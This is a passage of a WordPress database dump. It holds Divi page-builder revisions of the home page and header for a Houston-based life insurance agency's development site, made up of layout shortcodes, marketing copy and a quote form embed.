_dynamic_attributes=\"button_one_url,button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section]','Default Website Template','','inherit','closed','closed','','528-revision-v1','','','2023-04-08 19:28:20','2023-04-08 19:28:20','',528,'http://cmdev-site1.com/?p=798',0,'revision','',0),(802,1,'2023-04-08 19:29:40','2023-04-08 19:29:40','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" hover_enabled=\"0\" global_colors_info=\"{}\" background_color=\"rgba(158,153,153,0.1)\" sticky_enabled=\"0\" min_height=\"1552px\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"92px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Thumbs-Up-Icon-No-Background-Hex-666666.png\" title_text=\"Thumbs Up Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_margin=\"||10px|||\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-15px|||||\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Join Our Team!</h2>\n<p>J. Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-08 19:29:40','2023-04-08 19:29:40','',138,'http://cmdev-site1.com/?p=802',0,'revision','',0),(806,1,'2023-04-08 19:33:02','2023-04-08 19:33:02','[et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" column_structure=\"1_3,2_3\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"1_3\" theme_builder_area=\"post_content\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Thumbs-Up-Icon-No-Background-Hex-666666.png\" title_text=\"Thumbs Up Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\" theme_builder_area=\"post_content\"][/dsm_perspective_image][/et_pb_column][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"2_3\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_margin=\"||10px|||\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-15px|||||\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Join Our Team!</h2>\n<p>J. Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-08 19:33:02','2023-04-08 19:33:02','',138,'http://cmdev-site1.com/?p=806',0,'revision','',0),(803,1,'2023-04-08 19:30:16','2023-04-08 19:30:16','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" hover_enabled=\"0\" global_colors_info=\"{}\" background_color=\"rgba(158,153,153,0.1)\" sticky_enabled=\"0\" min_height=\"1552px\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"92px||66px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Thumbs-Up-Icon-No-Background-Hex-666666.png\" title_text=\"Thumbs Up Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_margin=\"||10px|||\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-15px|||||\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Join Our Team!</h2>\n<p>J. Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-08 19:30:16','2023-04-08 19:30:16','',138,'http://cmdev-site1.com/?p=803',0,'revision','',0),(800,1,'2023-04-08 19:28:36','2023-04-08 19:28:36','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Header-Full-Color-2200x1028-2.png\" min_height=\"700px\" custom_margin=\"||-45px|||\" custom_padding=\"23px||62px|||\" hover_transition_speed_curve=\"ease-out\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\" title_text=\"Header Full Color 2200x1028\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_menu active_link_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" min_height=\"221.9px\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"on|hover\" menu_text_color__hover=\"#003372\" theme_builder_area=\"et_header_layout\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" min_height=\"181px\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"]<h1><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url,button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section]','Default Website Template','','inherit','closed','closed','','528-revision-v1','','','2023-04-08 19:28:36','2023-04-08 19:28:36','',528,'http://cmdev-site1.com/?p=800',0,'revision','',0),(801,1,'2023-04-08 19:28:36','2023-04-08 19:28:36','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" hover_enabled=\"0\" global_colors_info=\"{}\" background_color=\"rgba(158,153,153,0.1)\" sticky_enabled=\"0\" min_height=\"1552px\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"92px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Thumbs-Up-Icon-No-Background-Hex-666666.png\" title_text=\"Thumbs Up Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_margin=\"||10px|||\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"112px|||||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You 